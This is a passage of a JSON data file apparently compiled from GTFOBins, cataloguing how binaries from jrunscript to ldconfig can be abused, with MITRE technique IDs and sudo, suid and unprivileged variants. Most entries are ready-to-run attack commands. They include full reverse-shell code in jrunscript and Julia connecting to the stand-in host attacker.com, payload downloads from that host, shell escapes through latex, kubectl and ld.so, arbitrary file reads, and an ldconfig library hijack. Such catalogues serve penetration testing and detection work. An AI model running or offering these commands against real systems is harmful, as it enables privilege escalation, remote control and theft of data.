(e){}};p.destroy();s.close();'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jrunscript/"]},{"id":"gtfo:jrunscript:reverse-shell:0:unprivileged","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"jrunscript -e 'var host=\"attacker.com\";\n var port=12345;\n var p=new java.lang.ProcessBuilder(\"/bin/sh\", \"-i\").redirectErrorStream(true).start();\n var s=new java.net.Socket(host,port);\n var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();\n var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){\n while(pi.available()>0)so.write(pi.read());\n while(pe.available()>0)so.write(pe.read());\n while(si.available()>0)po.write(si.read());\n so.flush();po.flush();\n java.lang.Thread.sleep(50);\n try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jrunscript/"]},{"id":"gtfo:jrunscript:shell:0:sudo","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"jrunscript -e 'exec(\"/bin/sh -c $@|sh _ echo sh </dev/tty >/dev/tty 2>/dev/tty\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jrunscript/"]},{"id":"gtfo:jrunscript:shell:0:suid","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"jrunscript -e 'exec(\"/bin/sh -pc $@|sh${IFS}-p _ echo sh -p </dev/tty >/dev/tty 2>/dev/tty\")'","description":"This has been found working in macOS but failing on Linux systems.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/jrunscript/"]},{"id":"gtfo:jrunscript:shell:0:unprivileged","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"jrunscript -e 'exec(\"/bin/sh -c $@|sh _ echo sh </dev/tty >/dev/tty 2>/dev/tty\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jrunscript/"]},{"id":"gtfo:jshell:file-read:0:sudo","toolId":"gtfo:jshell","toolName":"jshell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"jshell\njshell> /open /path/to/input-file","description":"The content is leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jshell/"]},{"id":"gtfo:jshell:file-read:0:unprivileged","toolId":"gtfo:jshell","toolName":"jshell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"jshell\njshell> /open /path/to/input-file","description":"The content is leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jshell/"]},{"id":"gtfo:jshell:file-write:0:sudo","toolId":"gtfo:jshell","toolName":"jshell","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"jshell\nString x = \"DATA\";\n/save /path/to/output-file","description":"Writes only the valid Java code to file.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jshell/"]},{"id":"gtfo:jshell:file-write:0:unprivileged","toolId":"gtfo:jshell","toolName":"jshell","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"jshell\nString x = \"DATA\";\n/save /path/to/output-file","description":"Writes only the valid Java code to file.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jshell/"]},{"id":"gtfo:jshell:shell:0:sudo","toolId":"gtfo:jshell","toolName":"jshell","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"jshell\nRuntime.getRuntime().exec(\"/path/to/command\");","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jshell/"]},{"id":"gtfo:jshell:shell:0:unprivileged","toolId":"gtfo:jshell","toolName":"jshell","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"jshell\nRuntime.getRuntime().exec(\"/path/to/command\");","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jshell/"]},{"id":"gtfo:jtag:shell:0:sudo","toolId":"gtfo:jtag","toolName":"jtag","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"jtag --interactive\nshell /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jtag/"]},{"id":"gtfo:jtag:shell:0:unprivileged","toolId":"gtfo:jtag","toolName":"jtag","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"jtag --interactive\nshell /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jtag/"]},{"id":"gtfo:julia:download:0:sudo","toolId":"gtfo:julia","toolName":"julia","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"julia -e 'download(\"http://attacker.com/path/to/input-file\", \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:download:0:suid","toolId":"gtfo:julia","toolName":"julia","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"julia -e 'download(\"http://attacker.com/path/to/input-file\", \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:download:0:unprivileged","toolId":"gtfo:julia","toolName":"julia","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"julia -e 'download(\"http://attacker.com/path/to/input-file\", \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:file-read:0:sudo","toolId":"gtfo:julia","toolName":"julia","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"julia -e 'print(open(f->read(f, String), \"/path/to/input-file\"))'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:file-read:0:suid","toolId":"gtfo:julia","toolName":"julia","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"julia -e 'print(open(f->read(f, String), \"/path/to/input-file\"))'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:file-read:0:unprivileged","toolId":"gtfo:julia","toolName":"julia","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"julia -e 'print(open(f->read(f, String), \"/path/to/input-file\"))'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:file-write:0:sudo","toolId":"gtfo:julia","toolName":"julia","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"julia -e 'open(f->write(f, \"DATA\"), /path/to/output-file, \"w\")'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:file-write:0:suid","toolId":"gtfo:julia","toolName":"julia","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"julia -e 'open(f->write(f, \"DATA\"), /path/to/output-file, \"w\")'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:file-write:0:unprivileged","toolId":"gtfo:julia","toolName":"julia","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"julia -e 'open(f->write(f, \"DATA\"), /path/to/output-file, \"w\")'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:reverse-shell:0:sudo","toolId":"gtfo:julia","toolName":"julia","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"julia -e 'using Sockets; sock=connect(\"attacker.com\", parse(Int64, 12345)); while true; cmd = readline(sock); if !isempty(cmd); cmd = split(cmd); ioo = IOBuffer(); ioe = IOBuffer(); run(pipeline(`$cmd`, stdout=ioo, stderr=ioe)); write(sock, String(take!(ioo)) * String(take!(ioe))); end; end;'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:reverse-shell:0:suid","toolId":"gtfo:julia","toolName":"julia","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"julia -e 'using Sockets; sock=connect(\"attacker.com\", parse(Int64, 12345)); while true; cmd = readline(sock); if !isempty(cmd); cmd = split(cmd); ioo = IOBuffer(); ioe = IOBuffer(); run(pipeline(`$cmd`, stdout=ioo, stderr=ioe)); write(sock, String(take!(ioo)) * String(take!(ioe))); end; end;'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:reverse-shell:0:unprivileged","toolId":"gtfo:julia","toolName":"julia","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"julia -e 'using Sockets; sock=connect(\"attacker.com\", parse(Int64, 12345)); while true; cmd = readline(sock); if !isempty(cmd); cmd = split(cmd); ioo = IOBuffer(); ioe = IOBuffer(); run(pipeline(`$cmd`, stdout=ioo, stderr=ioe)); write(sock, String(take!(ioo)) * String(take!(ioe))); end; end;'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:shell:0:sudo","toolId":"gtfo:julia","toolName":"julia","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"julia -e 'run(`/bin/sh`)'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:shell:0:suid","toolId":"gtfo:julia","toolName":"julia","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"julia -e 'run(`/bin/sh -p`)'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:shell:0:unprivileged","toolId":"gtfo:julia","toolName":"julia","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"julia -e 'run(`/bin/sh`)'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:knife:inherit:0:sudo","toolId":"gtfo:knife","toolName":"knife","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"knife exec -E '...'","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/knife/"]},{"id":"gtfo:knife:inherit:0:unprivileged","toolId":"gtfo:knife","toolName":"knife","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"knife exec -E '...'","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/knife/"]},{"id":"gtfo:ksshell:file-read:0:sudo","toolId":"gtfo:ksshell","toolName":"ksshell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ksshell -i /path/to/input-file","description":"Each line is corrupted by a prefix string. Also consider that lines are actually parsed as `kickstart` scripts thus some file contents may lead to unexpected results.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ksshell/"]},{"id":"gtfo:ksshell:file-read:0:suid","toolId":"gtfo:ksshell","toolName":"ksshell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ksshell -i /path/to/input-file","description":"Each line is corrupted by a prefix string. Also consider that lines are actually parsed as `kickstart` scripts thus some file contents may lead to unexpected results.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ksshell/"]},{"id":"gtfo:ksshell:file-read:0:unprivileged","toolId":"gtfo:ksshell","toolName":"ksshell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ksshell -i /path/to/input-file","description":"Each line is corrupted by a prefix string. Also consider that lines are actually parsed as `kickstart` scripts thus some file contents may lead to unexpected results.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ksshell/"]},{"id":"gtfo:ksu:shell:0:sudo","toolId":"gtfo:ksu","toolName":"ksu","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ksu -q -e /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ksu/"]},{"id":"gtfo:kubectl:shell:0:sudo","toolId":"gtfo:kubectl","toolName":"kubectl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cat >/path/to/temp-file <<EOF\nclusters:\n- cluster:\n server: https://x\n name: x\ncontexts:\n- context:\n cluster: x\n user: x\n name: x\ncurrent-context: x\nusers:\n- name: x\n user:\n exec:\n apiVersion: client.authentication.k8s.io/v1\n interactiveMode: Always\n command: /bin/sh\n args:\n - '-c'\n - '/bin/sh 0<&2 1>&2'\nEOF\n\nkubectl get pods --kubeconfig=/path/to/temp-file","description":"The shell is spawn multiple times.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/kubectl/"]},{"id":"gtfo:kubectl:shell:0:unprivileged","toolId":"gtfo:kubectl","toolName":"kubectl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cat >/path/to/temp-file <<EOF\nclusters:\n- cluster:\n server: https://x\n name: x\ncontexts:\n- context:\n cluster: x\n user: x\n name: x\ncurrent-context: x\nusers:\n- name: x\n user:\n exec:\n apiVersion: client.authentication.k8s.io/v1\n interactiveMode: Always\n command: /bin/sh\n args:\n - '-c'\n - '/bin/sh 0<&2 1>&2'\nEOF\n\nkubectl get pods --kubeconfig=/path/to/temp-file","description":"The shell is spawn multiple times.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/kubectl/"]},{"id":"gtfo:kubectl:upload:0:sudo","toolId":"gtfo:kubectl","toolName":"kubectl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"kubectl proxy --address=0.0.0.0 --port=12345 --www=/path/to/dir/ --www-prefix=/x/","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/kubectl/"]},{"id":"gtfo:kubectl:upload:0:suid","toolId":"gtfo:kubectl","toolName":"kubectl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"kubectl proxy --address=0.0.0.0 --port=12345 --www=/path/to/dir/ --www-prefix=/x/","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/kubectl/"]},{"id":"gtfo:kubectl:upload:0:unprivileged","toolId":"gtfo:kubectl","toolName":"kubectl","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"kubectl proxy --address=0.0.0.0 --port=12345 --www=/path/to/dir/ --www-prefix=/x/","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/kubectl/"]},{"id":"gtfo:last:file-read:0:sudo","toolId":"gtfo:last","toolName":"last","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"last -a -f /path/to/input-file","description":"The output might be corrupted or incomplete if the file does not follow the expected database format.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/last/"]},{"id":"gtfo:last:file-read:0:suid","toolId":"gtfo:last","toolName":"last","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"last -a -f /path/to/input-file","description":"The output might be corrupted or incomplete if the file does not follow the expected database format.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/last/"]},{"id":"gtfo:last:file-read:0:unprivileged","toolId":"gtfo:last","toolName":"last","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"last -a -f /path/to/input-file","description":"The output might be corrupted or incomplete if the file does not follow the expected database format.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/last/"]},{"id":"gtfo:latex:file-read:0:sudo","toolId":"gtfo:latex","toolName":"latex","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"latex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}'\nstrings texput.dvi","description":"The read file will be part of the PDF output.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/latex/"]},{"id":"gtfo:latex:file-read:0:suid","toolId":"gtfo:latex","toolName":"latex","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"latex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}'\nstrings texput.dvi","description":"The read file will be part of the PDF output.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/latex/"]},{"id":"gtfo:latex:file-read:0:unprivileged","toolId":"gtfo:latex","toolName":"latex","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"latex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}'\nstrings texput.dvi","description":"The read file will be part of the PDF output.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/latex/"]},{"id":"gtfo:latex:file-write:0:sudo","toolId":"gtfo:latex","toolName":"latex","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"latex '\\documentclass{article}\\newwrite\\tempfile\\begin{document}\\immediate\\openout\\tempfile=output-file.tex\\immediate\\write\\tempfile{DATA}\\immediate\\closeout\\tempfile\\end{document}'","description":"The file can only be written in the current directory, and the `.tex` extension is mandatory.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/latex/"]},{"id":"gtfo:latex:file-write:0:suid","toolId":"gtfo:latex","toolName":"latex","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"latex '\\documentclass{article}\\newwrite\\tempfile\\begin{document}\\immediate\\openout\\tempfile=output-file.tex\\immediate\\write\\tempfile{DATA}\\immediate\\closeout\\tempfile\\end{document}'","description":"The file can only be written in the current directory, and the `.tex` extension is mandatory.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/latex/"]},{"id":"gtfo:latex:file-write:0:unprivileged","toolId":"gtfo:latex","toolName":"latex","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"latex '\\documentclass{article}\\newwrite\\tempfile\\begin{document}\\immediate\\openout\\tempfile=output-file.tex\\immediate\\write\\tempfile{DATA}\\immediate\\closeout\\tempfile\\end{document}'","description":"The file can only be written in the current directory, and the `.tex` extension is mandatory.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/latex/"]},{"id":"gtfo:latex:shell:0:sudo","toolId":"gtfo:latex","toolName":"latex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"latex --shell-escape '\\immediate\\write18{/bin/sh}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/latex/"]},{"id":"gtfo:latex:shell:0:suid","toolId":"gtfo:latex","toolName":"latex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"latex --shell-escape '\\immediate\\write18{/bin/sh}'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/latex/"]},{"id":"gtfo:latex:shell:0:unprivileged","toolId":"gtfo:latex","toolName":"latex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"latex --shell-escape '\\immediate\\write18{/bin/sh}'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/latex/"]},{"id":"gtfo:latexmk:file-read:0:sudo","toolId":"gtfo:latexmk","toolName":"latexmk","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}' >/path/to/temp-file\nlatexmk -dvi /path/to/temp-file\nstrings temp-file.dvi","description":"The read file will be part of the output.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/latexmk/"]},{"id":"gtfo:latexmk:file-read:0:unprivileged","toolId":"gtfo:latexmk","toolName":"latexmk","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"echo '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}' >/path/to/temp-file\nlatexmk -dvi /path/to/temp-file\nstrings temp-file.dvi","description":"The read file will be part of the output.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/latexmk/"]},{"id":"gtfo:latexmk:inherit:0:sudo","toolId":"gtfo:latexmk","toolName":"latexmk","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"latexmk -e '...'","description":"This allows to run Perl code (`...`).","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/latexmk/"]},{"id":"gtfo:latexmk:inherit:0:unprivileged","toolId":"gtfo:latexmk","toolName":"latexmk","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"latexmk -e '...'","description":"This allows to run Perl code (`...`).","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/latexmk/"]},{"id":"gtfo:latexmk:shell:0:sudo","toolId":"gtfo:latexmk","toolName":"latexmk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"latexmk -pdf -pdflatex='/bin/sh #' /dev/null","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/latexmk/"]},{"id":"gtfo:latexmk:shell:0:unprivileged","toolId":"gtfo:latexmk","toolName":"latexmk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"latexmk -pdf -pdflatex='/bin/sh #' /dev/null","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/latexmk/"]},{"id":"gtfo:ld.so:shell:0:sudo","toolId":"gtfo:ld.so","toolName":"ld.so","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"/path/to/ld.so /bin/sh","description":"The spawned process will be the loader, not the target executable, this might aid evasion. See <https://shyft.us/posts/20230526_linux_command_proxy.html> for more information.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ld.so/"]},{"id":"gtfo:ld.so:shell:0:suid","toolId":"gtfo:ld.so","toolName":"ld.so","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"/path/to/ld.so /bin/sh -p","description":"The spawned process will be the loader, not the target executable, this might aid evasion. See <https://shyft.us/posts/20230526_linux_command_proxy.html> for more information.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ld.so/"]},{"id":"gtfo:ld.so:shell:0:unprivileged","toolId":"gtfo:ld.so","toolName":"ld.so","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"/path/to/ld.so /bin/sh","description":"The spawned process will be the loader, not the target executable, this might aid evasion. See <https://shyft.us/posts/20230526_linux_command_proxy.html> for more information.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ld.so/"]},{"id":"gtfo:ldconfig:library-load:0:sudo","toolId":"gtfo:ldconfig","toolName":"ldconfig","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"echo /path/to/temp-dir/ >/path/to/temp-file\nldconfig -f /path/to/temp-file\nping","description":"This allows to override one or more shared libraries (e.g., `libpcap`) globally, then triggers the execution by running a program that uses it, e.g., `ping`. This is particularly useful if the target binary is SUID. Beware though that it is easy to end up with a broken target system.\n\nFirst identify the shared libraries used by the target program, for example:\n\n```\n$ ldd /bin/ping | grep libcap\n libcap.so.2 => /path/to/temp-dir/libcap.so.2 (0x00007f8417eef000)\n```\n\nThen create the shared library override, named `libcap.so.2`, and put in in `/path/to/temp-dir/`. The program might require some exported symbols from the library override, in that case make sure to add them (e.g., `void cap_get_flag() {}`).","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ldconfig/"]},{"id":"gtfo:ldconfig:library-load:0:suid","toolId":"gtfo:ldconfig","toolName":"ldconfig","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"echo /path/to/temp-dir/ >/path/to/temp-file\nldconfig -f /path/to/temp-file\nping","description":"This allows to override one or more shared libraries (e.g., `libpcap`) globally, then triggers the execution by running a program that uses it, e.g., `ping`. This is particularly useful if the target binary is SUID. Beware though that it is easy to end up with a broken target system.\n\nFirst identify the shared libraries used by the target program, for example:\n\n```\n$ ldd /bin/ping | grep libcap\n libcap.so.2 => /path/to/temp-dir/libcap.so.2 (0x00007f8417eef000)\n```\n\nThen create the shared library override, named `libcap.so.2`, and put in in `/path/to/temp-dir/`. The program might require some exported symbols from the library override, in that case make sure to add them (e.g., `void cap_get_flag() {}`).","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ldconfig/"]},{"id":"gtfo:ldconfig:library-load:0:unprivileged","toolId":"gtfo:ldconfig","toolName":"ldconfig","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"echo /path/to/temp-dir/ >/path/to/temp-file\nldconfig -f 